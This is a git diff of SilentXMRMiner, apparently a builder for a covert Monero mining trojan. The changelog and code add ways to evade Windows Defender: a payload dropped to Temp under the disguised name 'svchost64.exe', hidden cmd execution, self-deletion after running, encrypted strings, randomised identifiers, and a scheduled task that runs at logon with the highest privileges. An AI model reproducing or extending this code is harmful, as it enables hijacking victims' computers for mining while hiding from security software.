diff --git a/README.md b/README.md index 0e764ed..cb8cf2a 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ -# SilentXMRMiner v1.4.2 - Based on Lime Miner v0.3 +# SilentXMRMiner v1.4.3 - Based on Lime Miner v0.3 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**. @@ -41,6 +41,9 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w ## Changes +### v1.4.3 (19/07/2021) +* Greatly reduced Windows Defender detections when "Bypass Windows Defender" is enabled by replacing Assembly.Load with simply writing the payload to Temp and executing it since the folders are excluded +* Fixed the paths for systems that have custom lowercase characters like Turkish ### v1.4.2 (14/07/2021) * Remade watchdog to reduce detections * Obfuscated more strings to reduce new Windows Defender detections diff --git a/SilentXMRMiner/Codedom.vb b/SilentXMRMiner/Codedom.vb index afa5b1a..8a7f47c 100644 --- a/SilentXMRMiner/Codedom.vb +++ b/SilentXMRMiner/Codedom.vb @@ -29,7 +29,6 @@ Public Class Codedom .ReferencedAssemblies.Add("System.Windows.Forms.dll") End If .ReferencedAssemblies.Add("System.dll") - .ReferencedAssemblies.Add("System.Core.dll") .ReferencedAssemblies.Add("System.Management.dll") .ReferencedAssemblies.Add("System.IO.Compression.dll") .ReferencedAssemblies.Add("System.IO.Compression.FileSystem.dll") @@ -208,7 +207,6 @@ Public Class Codedom .CompilerOptions = OP .IncludeDebugInformation = False .ReferencedAssemblies.Add("System.dll") - .ReferencedAssemblies.Add("System.Core.dll") .ReferencedAssemblies.Add("System.Management.dll") If F.FA.toggleEnableDebug.Checked Then .ReferencedAssemblies.Add("System.Windows.Forms.dll") @@ -314,6 +312,7 @@ Public Class Codedom stringb.Replace("#WATCHDOG", F.EncryptString("sihost64")) stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn ")) stringb.Replace("#MINERID", F.EncryptString("--cinit-find-x")) + stringb.Replace("#DROPFILE", F.EncryptString("svchost64.exe")) stringb.Replace("#InjectionTarget", F.EncryptString(F.InjectionTarget(0))) stringb.Replace("#InjectionDir", F.InjectionTarget(1).Replace("(", "").Replace(")", "").Replace("%WINDIR%", """ + Environment.GetFolderPath(Environment.SpecialFolder.Windows) + """)) @@ -333,6 +332,7 @@ Public Class Codedom stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("RProgram", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("RExit", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40))) diff --git a/SilentXMRMiner/Form1.Designer.vb b/SilentXMRMiner/Form1.Designer.vb index c862b34..ba98857 100644 --- a/SilentXMRMiner/Form1.Designer.vb +++ b/SilentXMRMiner/Form1.Designer.vb @@ -346,7 +346,7 @@ Partial Class Form1 Me.MephForm1.Size = New System.Drawing.Size(535, 272) Me.MephForm1.SubHeader = "By Unam Sanctam, Credit to NYAN-x-CAT" Me.MephForm1.TabIndex = 0 - Me.MephForm1.Text = "Silent XMR Miner Builder 1.4.2" + Me.MephForm1.Text = "Silent XMR Miner Builder 1.4.3" ' 'MephTabcontrol2 ' diff --git a/SilentXMRMiner/Resources/Loader.cs b/SilentXMRMiner/Resources/Loader.cs index 7e752b5..7c15efb 100644 --- a/SilentXMRMiner/Resources/Loader.cs +++ b/SilentXMRMiner/Resources/Loader.cs @@ -8,7 +8,6 @@ using System.Threading; using System.Diagnostics; using System.Runtime.InteropServices; -using System.Linq; #if DefDebug using System.Windows.Forms; #endif @@ -64,7 +63,20 @@ public static void Main() try { +#if DefKillWD + string fn = Path.Combine(Path.GetTempPath(), Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String("#DROPFILE")))); + File.WriteAllBytes(fn, RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program"))); + Process.Start(new ProcessStartInfo + { + FileName = "cmd", + Arguments = "/c " + fn + " \"" + Assembly.GetEntryAssembly().Location + "\"", + WorkingDirectory = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true, + }); +#else Assembly.Load(RAES_Method((byte[])new ResourceManager("#LoaderRes", Assembly.GetExecutingAssembly()).GetObject("#Program"))).EntryPoint.Invoke(null, new object[0]); +#endif } catch (Exception ex) { diff --git a/SilentXMRMiner/Resources/Program.cs b/SilentXMRMiner/Resources/Program.cs index 39cb072..ca91637 100644 --- a/SilentXMRMiner/Resources/Program.cs +++ b/SilentXMRMiner/Resources/Program.cs @@ -28,12 +28,17 @@ public partial class RProgram { #if DefSystem32 - public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH")).ToLower(); + public static string rbD = ((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) + @"\" + RGetString("#LIBSPATH")); #else - public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower(); + public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")); #endif #if DefInstall - public static string rplp = (PayloadPath).ToLower(); + public static string rplp = PayloadPath; +#endif +#if DefKillWD + public static string cmdl = Environment.GetCommandLineArgs()[1]; +#else + public static string cmdl = Assembly.GetEntryAssembly().Location; #endif public static void Main() @@ -67,7 +72,7 @@ public static void Main() #endif } - if (Assembly.GetEntryAssembly().Location.ToLower() != rplp) + if (cmdl.ToLower() != rplp.ToLower()) { foreach (Process proc in Process.GetProcessesByName(RGetString("#WATCHDOG"))) { @@ -85,7 +90,7 @@ public static void Main() } catch(Exception ex) {} Directory.CreateDirectory(Path.GetDirectoryName(rplp)); - File.Copy(Assembly.GetEntryAssembly().Location.ToLower(), rplp, true); + File.Copy(cmdl, rplp, true); Thread.Sleep(2 * 1000); Process.Start(new ProcessStartInfo { @@ -94,7 +99,7 @@ public static void Main() WindowStyle = ProcessWindowStyle.Hidden, CreateNoWindow = true, }); - Environment.Exit(0); + RExit(); } #endif @@ -140,7 +145,7 @@ public static void Main() { if (MemObj != null && MemObj["CommandLine"] != null && MemObj["CommandLine"].ToString().Contains(RGetString("#MINERID"))) { - Environment.Exit(0); + RExit(); } } @@ -290,6 +295,7 @@ public static void Main() MessageBox.Show("M8: " + Environment.NewLine + ex.ToString()); #endif } + RExit(); } public static byte[] RGetTheResource(string rarg1) @@ -312,6 +318,20 @@ public static string RTruncate(string rarg1, int rarg2) return rarg1.Length > rarg2 ? rarg1.Substring(0, rarg2) : rarg1; } + public static void RExit() + { +#if DefKillWD + Process.Start(new ProcessStartInfo() + { + FileName = "cmd", + Arguments = "/C choice /C Y /N /D Y /T 3 & Del \"" + Assembly.GetEntryAssembly().Location + "\"", + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + }); +#endif + Environment.Exit(0); + } + #if DefGPU public static string RGetGPU() { diff --git a/SilentXMRMiner/Resources/Uninstaller.cs b/SilentXMRMiner/Resources/Uninstaller.cs index 5349009..69c1a07 100644 --- a/SilentXMRMiner/Resources/Uninstaller.cs +++ b/SilentXMRMiner/Resources/Uninstaller.cs @@ -19,9 +19,9 @@ public partial class RUninstaller { - public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")).ToLower(); + public static string rbD = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH")); #if DefSystem32 - public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH")).ToLower(); + public static string rbD2 = (Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH")); #endif public static void Main() @@ -47,7 +47,7 @@ public static void Main() { if (key != null) { - key.DeleteValue(Path.GetFileName(PayloadPath).ToLower()); + key.DeleteValue(Path.GetFileName(PayloadPath)); } } } @@ -117,7 +117,7 @@ public static void Main() Directory.Delete(rbD2, true); #endif #if DefInstall - File.Delete((PayloadPath).ToLower()); + File.Delete(PayloadPath); #endif } catch (Exception ex) diff --git a/SilentXMRMiner/Resources/Watchdog.cs b/SilentXMRMiner/Resources/Watchdog.cs index 4740afa..99d3150 100644 --- a/SilentXMRMiner/Resources/Watchdog.cs +++ b/SilentXMRMiner/Resources/Watchdog.cs @@ -24,7 +24,7 @@ public partial class RProgram { public static byte[] rxM = { }; public static int rcheckcount = 0; - public static string rplp = (PayloadPath).ToLower(); + public static string rplp = PayloadPath; public static void Main() {